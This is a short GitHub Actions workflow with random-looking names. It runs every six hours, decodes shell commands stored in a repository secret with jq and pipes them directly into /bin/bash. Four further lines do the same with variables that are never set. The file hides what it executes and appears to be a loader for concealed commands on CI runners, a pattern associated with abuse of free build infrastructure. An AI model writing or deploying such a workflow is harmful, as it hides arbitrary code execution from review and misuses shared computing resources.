name: qiyuanzhen4891
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiyuanzhen4891
        env:
          hkg8871: ${{ secrets.hkg8871 }}
        run: |
          echo $hkg8871 | jq -r .uwvb9 | /bin/bash
          echo $azgrd5 | jq -r .ypa701 | /bin/bash
          echo $ont811 | jq -r .g882 | /bin/bash
          echo $tif34 | jq -r .cog0200 | /bin/bash
          echo $ezkc24 | jq -r .hl1553 | /bin/bash

